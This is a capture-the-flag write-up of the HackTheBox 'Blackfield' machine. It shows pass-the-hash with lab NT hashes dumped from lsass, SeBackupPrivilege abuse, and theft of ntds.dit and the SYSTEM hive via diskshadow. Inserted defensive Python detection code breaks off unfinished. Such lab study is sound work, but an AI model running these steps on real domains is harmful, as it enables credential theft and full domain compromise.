sleuthkit-4.8.0-win32 D 0 Sun Feb 23 14:39:03 2020
sysinternals D 0 Sun Feb 23 14:35:25 2020
volatility D 0 Sun Feb 23 14:35:39 2020
7846143 blocks of size 4096. 4064625 blocks available
smb: \tools\>
These tools are usually used to investigate a system and to produce report files (like the ones found in the other folders); are these clues left there on purpose? Just to understand, let's search the first one on Google:
The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (2.8 KiloBytes/sec) (average 2.8 KiloBytes/sec)
[...]
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (52.7 KiloBytes/sec) (average 300.0 KiloBytes/sec)
getting file \memory_analysis\conhost.zip of size 37876530 as conhost.zip (1554.3 KiloBytes/sec) (average 1465.0 KiloBytes/sec)
[...]
getting file \memory_analysis\WmiPrvSE.zip of size 18303252 as WmiPrvSE.zip (997.3 KiloBytes/sec) (average 1285.9 KiloBytes/sec)
The first folder seems to contain a set of files exported from the machine's activity logs plus additional information about the system. I give it a quick look, but I feel confident that nothing particularly interesting is to be found here; anyway, I have these files on my machine and can come back later to understand them better.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/commands_output$ ls -la
total 576
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Jun 20 09:59 .
drwxr-xr-x 4 in7rud3r in7rud3r 4096 Jun 20 10:10 ..
-rw-r--r-- 1 in7rud3r in7rud3r 528 Jun 20 09:59 domain_admins.txt
-rw-r--r-- 1 in7rud3r in7rud3r 962 Jun 20 09:59 domain_groups.txt
-rw-r--r-- 1 in7rud3r in7rud3r 16454 Jun 20 09:59 domain_users.txt
-rw-r--r-- 1 in7rud3r in7rud3r 518202 Jun 20 09:59 firewall_rules.txt
-rw-r--r-- 1 in7rud3r in7rud3r 1782 Jun 20 09:59 ipconfig.txt
-rw-r--r-- 1 in7rud3r in7rud3r 3842 Jun 20 09:59 netstat.txt
-rw-r--r-- 1 in7rud3r in7rud3r 3976 Jun 20 09:59 route.txt
-rw-r--r-- 1 in7rud3r in7rud3r 4550 Jun 20 09:59 systeminfo.txt
-rw-r--r-- 1 in7rud3r in7rud3r 9990 Jun 20 09:59 tasklist.txt
In the second folder, I found something more interesting:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ zip -sf conhost.zip
Archive contains:
conhost.DMP
Total 1 entries (104500231 bytes)
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ zip -sf ctfmon.zip
Archive contains:
ctfmon.DMP
Total 1 entries (69423930 bytes)
Dump files: could some specific dump turn out useful to me? Search on the internet for "exploit DMP file from windows" and
Great, it seems I need the lsass dump, and I'm so lucky that:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
Now, I spent hours trying to make mimikatz work on my machine, but... nothing. So I searched for an alternative on the network and found pypykatz:
And let me say, it works really well.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ pypykatz lsa -o dmp-lsass-analisys.txt minidump lsass.DMP
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
[...]
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
== SSP [25869]==
username
domainname
password None
== Kerberos ==
Username: Administrator
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
== DPAPI [25869]==
luid 153705
key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
[...]
== LogonSession ==
authentication_id 406499 (633e3)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406499
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
== WDIGEST [633e3]==
username svc_backup
domainname BLACKFIELD
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [633e3]==
username svc_backup
domainname BLACKFIELD
password None
== DPAPI [633e3]==
luid 406499
key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991
The output is really long, so I extract only the interesting parts: the password hashes of the svc_backup user and of the Administrator. If you remember one of my past writeups (I hope it has already been published; it depends on the retirement order of the machines on HTB), we can use the hash instead of the password with the Evil-WinRM tool, which we are going to use to connect to the remote machine and get a shell on it. Obviously, I try the Administrator's hash first:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r:
Swipe your right index finger across the fingerprint reader
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
But it doesn't work; probably it's an old dump and the password has been changed since. Let's try the other user:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -s '/ps1_scripts/' -e '/exe_files/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
And finally, we have the shell. The user flag is very simple now: check whether it is available to the svc_backup user we are connected as, and take it from the usual folder:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> pwd
Path
----
C:\Users\svc_backup\Documents
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_backup> ls
Directory: C:\Users\svc_backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/23/2020 9:16 AM 3D Objects
d-r--- 2/23/2020 9:16 AM Contacts
d-r--- 2/28/2020 2:26 PM Desktop
d-r--- 6/19/2020 2:05 PM Documents
d-r--- 2/23/2020 9:16 AM Downloads
d-r--- 2/23/2020 9:16 AM Favorites
d-r--- 2/23/2020 9:16 AM Links
d-r--- 2/23/2020 9:16 AM Music
d----- 6/19/2020 8:53 AM ntds
d-r--- 2/23/2020 9:16 AM Pictures
d-r--- 2/23/2020 9:16 AM Saved Games
d-r--- 2/23/2020 9:16 AM Searches
d-r--- 2/23/2020 9:16 AM Videos
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/19/2020 4:16 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
a******************************6
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
Well done, let's go for root. Ok, try to reach the root.txt file, but you will get a bad surprise. You will also find an additional file next to root.txt that provides some more information, but I don't think I used it.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 4:36 PM 447 notes.txt
-ar--- 6/19/2020 4:16 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Another interesting tool for enumerating and investigating from inside a Windows machine is winPEAS, available as an executable or as a batch file. Upload it to the remote machine with the upload command of Evil-WinRM and launch it. As usual, I report only the part of the output that gave me useful information:
*Evil-WinRM* PS C:\temp\not-this> ./winPEAS.bat
[...]
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[...]
It seems that my current account has these privileges. I concentrated on SeBackupPrivilege, SeRestorePrivilege and SeIncreaseWorkingSetPrivilege. I couldn't find anything interesting for the last two, but the first one gave me some hope. Searching on Google for "SeBackupPrivilege exploit":
Also in this case I lost many hours trying and retrying, because I could not reach the outcome described on the page, until I finally found the right sequence of commands to run on the target machine. But first, upload the two library files to the remote machine:
*Evil-WinRM* PS C:\temp\not-this> upload /data/SeBackupPrivilegeCmdLets.dll
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Uploading /data/SeBackupPrivilegeCmdLets.dll to C:\temp\not-this\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp\not-this> upload /data/SeBackupPrivilegeUtils.dll
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Uploading /data/SeBackupPrivilegeUtils.dll to C:\temp\not-this\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp\not-this> ls
Directory: C:\temp\not-this
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/20/2020 4:20 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 6/20/2020 4:20 PM 16384 SeBackupPrivilegeUtils.dll
-a---- 6/20/2020 2:54 PM 32976 winPEAS.bat
I list here two other useful links that helped me understand the right way to achieve privilege escalation. One of them comes from the winPEAS analysis, in the section about these specific privileges, which reports:
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_->[*] BASIC USER INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
The second one extends the first; I reached it while investigating the problem, when, trying the exploits, I realised that I could not access the file even using the backup features available to my credentials.
The steps I'm going to describe are not needed to accomplish the hack, but they helped me understand how to proceed, and I'd like to explain them to you. Look at this...
*Evil-WinRM* PS C:\temp\not-this> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\temp\not-this> $acl = get-acl c:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\temp\not-this> $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule('BLACKFIELD\svc_backup','FullControl','None','None','Allow')
*Evil-WinRM* PS C:\temp\not-this> $acl.AddAccessRule($permisoacl)
*Evil-WinRM* PS C:\temp\not-this> set-acl -Path c:\Users\Administrator\Desktop\root.txt -AclObject $acl
*Evil-WinRM* PS C:\temp\not-this> type c:\Users\Administrator\Desktop\root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type c:\Users\Administrator\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
You can see that I cannot read the file, although I should now have access to it. I get the same confirmation when I try to back up the file: again, access is denied:
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
Obviously, many of you with more experience will be thinking that I fail because this is not the correct way to use these commands... okay, I accept the criticism; I discovered it at my own expense, but, like many others who read my articles, I am learning, and I want to remind you that I come from a developer background, not a sysadmin one.
The strangest thing, which I did not understand immediately, is shown by this sequence of instructions executed in the shell:
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
*Evil-WinRM* PS C:\temp\not-this> get-acl -path c:\Users\Administrator\Desktop\root.txt | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner : BUILTIN\Administrators
Group : BLACKFIELD\Domain Users
Access : BLACKFIELD\Administrator Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BLACKFIELD\Administrator Allow FullControl
Audit :
Sddl : O:BAG:DUD:AI(A;;FA;;;LA)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)
*Evil-WinRM* PS C:\temp\not-this> $acl = get-acl c:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\temp\not-this> $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule('BLACKFIELD\svc_backup','FullControl','None','None','Allow')
*Evil-WinRM* PS C:\temp\not-this> $acl.AddAccessRule($permisoacl)
*Evil-WinRM* PS C:\temp\not-this> set-acl -Path c:\Users\Administrator\Desktop\root.txt -AclObject $acl
*Evil-WinRM* PS C:\temp\not-this> get-acl -path c:\Users\Administrator\Desktop\root.txt | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner : BUILTIN\Administrators
Group : BLACKFIELD\Domain Users
Access : BLACKFIELD\Administrator Allow FullControl
BLACKFIELD\svc_backup Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BLACKFIELD\Administrator Allow FullControl
Audit :
Sddl : O:BAG:DUD:AI(A;;FA;;;LA)(A;;FA;;;S-1-5-21-4194615774-2175524697-3563712290-1413)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
As you can see, at the beginning I have no access to the file; after the change an ACE for svc_backup is present in the DACL, yet I still cannot read it. The notes.txt on the same desktop says the file was encrypted, which is consistent with an ACL change alone not being enough. The same thing happened when I found that article about the ntds.dit file:
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
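To see exactly what the Set-Acl call changed, here is an added example (my own code, not part of the walkthrough) that parses the two Sddl strings printed by get-acl above and diffs them; the same old/new descriptor strings are what Security event 4670 ("Permissions on an object were changed") records, so a defender can run the same comparison over those events. The only assumption is that the descriptor uses the O:/G:/D: layout shown on this page.

```python
import re
from dataclasses import dataclass

# Constructed from the two get-acl outputs above: the DACL of root.txt before and
# after the Set-Acl call (event 4670 carries the same strings as old/new descriptor).
SDDL_BEFORE = "O:BAG:DUD:AI(A;;FA;;;LA)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)"
SDDL_AFTER = ("O:BAG:DUD:AI(A;;FA;;;LA)"
              "(A;;FA;;;S-1-5-21-4194615774-2175524697-3563712290-1413)"
              "(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)")

# Subset of the SDDL abbreviations that appear on this page.
TRUSTEES = {"BA": "BUILTIN\\Administrators", "SY": "NT AUTHORITY\\SYSTEM",
            "LA": "Administrator (domain)", "DU": "Domain Users"}
ACE_TYPES = {"A": "Allow", "D": "Deny", "AU": "Audit"}
RIGHTS = {"FA": "FullControl", "FR": "Read", "FW": "Write", "FX": "Execute"}


@dataclass(frozen=True)
class Ace:
    ace_type: str
    flags: tuple
    rights: tuple
    trustee: str

    def inherited(self):
        return "ID" in self.flags

    def describe(self):
        who = TRUSTEES.get(self.trustee, self.trustee)
        rights = "|".join(RIGHTS.get(r, r) for r in self.rights)
        origin = "inherited" if self.inherited() else "explicit"
        return f"{ACE_TYPES.get(self.ace_type, self.ace_type)} {rights} to {who} ({origin})"


def _pairs(token):
    # SDDL packs flags and rights as two-character codes; hex masks are kept whole.
    if token.startswith("0x"):
        return (token,)
    return tuple(token[i:i + 2] for i in range(0, len(token), 2))


def parse_sddl(sddl):
    """Return (owner, group, dacl_flags, [Ace, ...]) for a file SDDL string."""
    m = re.fullmatch(r"O:([^:]+?)G:([^:]+?)D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if not m:
        raise ValueError("unsupported SDDL layout")
    owner, group, dacl_flags, ace_text = m.groups()
    aces = []
    for body in re.findall(r"\(([^)]*)\)", ace_text):
        ace_type, flags, rights, _obj, _inh_obj, sid = body.split(";")
        aces.append(Ace(ace_type, _pairs(flags), _pairs(rights), sid))
    return owner, group, _pairs(dacl_flags), aces


def added_aces(before, after):
    """ACEs present in the new descriptor but not in the old one (order-insensitive)."""
    old = set(parse_sddl(before)[3])
    return [a for a in parse_sddl(after)[3] if a not in old]


def rid(sid):
    """Last sub-authority of a domain SID; it matches the RID column of an NTDS dump."""
    return int(sid.rsplit("-", 1)[1])
```

Running `added_aces(SDDL_BEFORE, SDDL_AFTER)` reports a single explicit Allow FullControl ACE for the SID ending in RID 1413, the RID that the secretsdump output later in this article shows for svc_backup.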
From now on, I concentrated on the ntds.dit file, searching the internet for specific use cases.
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "set context persistent nowriters" | out-file ./cmd -encoding ascii
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "add volume c: alias temp" | out-file ./cmd -encoding ascii -append
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "create" | out-file ./cmd -encoding ascii -append
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "expose %temp% z:" | out-file ./cmd -encoding ascii -append
*Evil-WinRM* PS C:\temp\not-this\fhere> cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% z:
*Evil-WinRM* PS C:\temp\not-this\fhere> diskshadow.exe /s .\cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/21/2020 1:30:12 PM
-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {40b73fa4-0ba8-4c2b-a24e-870c35369800} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {2990c3a6-dcba-4515-9ceb-2f340f48ff3d} set as environment variable.
Querying all shadow copies with the shadow copy set ID {2990c3a6-dcba-4515-9ceb-2f340f48ff3d}
* Shadow copy ID = {40b73fa4-0ba8-4c2b-a24e-870c35369800} %temp%
- Shadow copy set: {2990c3a6-dcba-4515-9ceb-2f340f48ff3d} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 6/21/2020 1:30:16 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {40b73fa4-0ba8-4c2b-a24e-870c35369800}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege z:\users\administrator\desktop\root.txt C:\temp\not-this\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege z:\users\administrator\desktop\root.txt C: ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
After a couple of days spent on these exploits, it seemed that I was at a dead end, but this last attempt, despite its negative result, inspired me more than the others, so I decided to restart the machine and rerun the whole process, and finally...
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit .\ntds.dit -Overwrite
*Evil-WinRM* PS C:\temp\not-this> ls
Directory: C:\temp\not-this
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2020 2:19 PM 617 2020-06-21_14-19-33_DC01.cab
-a---- 6/21/2020 2:19 PM 86 cmd
-a---- 6/21/2020 2:20 PM 18874368 ntds.dit
-a---- 6/21/2020 2:15 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 6/21/2020 2:15 PM 16384 SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> download ntds.dit /data/ntds.dit
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\temp\not-this\ntds.dit to /data/ntds.dit
Info: Download successful!
Ok, let's go for the final part: download it, then export the registry hive that allows us to decrypt the password hashes, as described in the tutorial linked before.
*Evil-WinRM* PS C:\temp\not-this> reg save hklm\system c:\temp\system.bak
The operation completed successfully.
*Evil-WinRM* PS C:\temp\not-this> cd ..
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2020 2:20 PM not-this
-a---- 6/21/2020 2:26 PM 17387520 system.bak
*Evil-WinRM* PS C:\temp> download .\system.bak /data/system.bak
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\temp\.\system.bak to /data/system.bak
Info: Download successful!
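From a defender's point of view, the sequence just shown (the SeBackupPrivilege cmdlets, a scripted diskshadow.exe, a copy of ntds.dit out of the exposed shadow, reg save of the SYSTEM hive) is a recognisable chain. The following added example, not from the original post, runs detection logic over constructed process-creation events modelled on those commands; the event fields, the rule patterns and the 15-minute correlation window are my assumptions.

```python
import re
from datetime import datetime, timedelta

# Each rule is a regex run over the lower-cased command line of a process-creation
# event (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled).
RULES = {
    "diskshadow_scripted": re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b"),
    "reg_save_hive": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(system|sam|security)\b"),
    "ntds_dit_access": re.compile(r"\\ntds\\ntds\.dit\b"),
    "sebackup_cmdlets": re.compile(
        r"copy-filesebackupprivilege|sebackupprivilege(utils|cmdlets)\.dll"),
}
WINDOW = timedelta(minutes=15)  # hits closer than this are treated as one chain

# Constructed sample events modelled on the commands in this walkthrough (not real logs).
SAMPLE_EVENTS = [
    {"time": "2020-06-21T13:25:10", "user": "BLACKFIELD\\svc_backup",
     "cmdline": "powershell.exe Import-Module .\\SeBackupPrivilegeCmdLets.dll"},
    {"time": "2020-06-21T13:30:12", "user": "BLACKFIELD\\svc_backup",
     "cmdline": "diskshadow.exe /s .\\cmd"},
    {"time": "2020-06-21T13:31:05", "user": "BLACKFIELD\\svc_backup",
     "cmdline": "powershell.exe Copy-FileSeBackupPrivilege "
                "z:\\windows\\ntds\\ntds.dit .\\ntds.dit -Overwrite"},
    {"time": "2020-06-21T13:36:40", "user": "BLACKFIELD\\svc_backup",
     "cmdline": "reg save hklm\\system c:\\temp\\system.bak"},
    {"time": "2020-06-21T13:40:00", "user": "NT AUTHORITY\\SYSTEM",  # benign noise
     "cmdline": "reg.exe query hklm\\software\\microsoft\\windows nt\\currentversion"},
]


def match_rules(event):
    """Names of the rules whose pattern matches this event's command line."""
    cmd = event["cmdline"].lower()
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def correlate(events, min_rules=2):
    """Group rule hits per user and emit one alert per window in which at least
    `min_rules` distinct rules fired for that user. Returns a list of alert dicts."""
    hits = sorted((datetime.fromisoformat(e["time"]), e["user"], name)
                  for e in events for name in match_rules(e))
    alerts = []
    for user in sorted({u for _, u, _ in hits}):
        mine = [(t, n) for t, u, n in hits if u == user]
        i = 0
        while i < len(mine):
            t0 = mine[i][0]
            window = [(t, n) for t, n in mine[i:] if t - t0 <= WINDOW]
            names = sorted({n for _, n in window})
            if len(names) >= min_rules:
                alerts.append({"user": user, "start": t0.isoformat(), "rules": names})
            i += len(window)  # move past the hits already covered by this window
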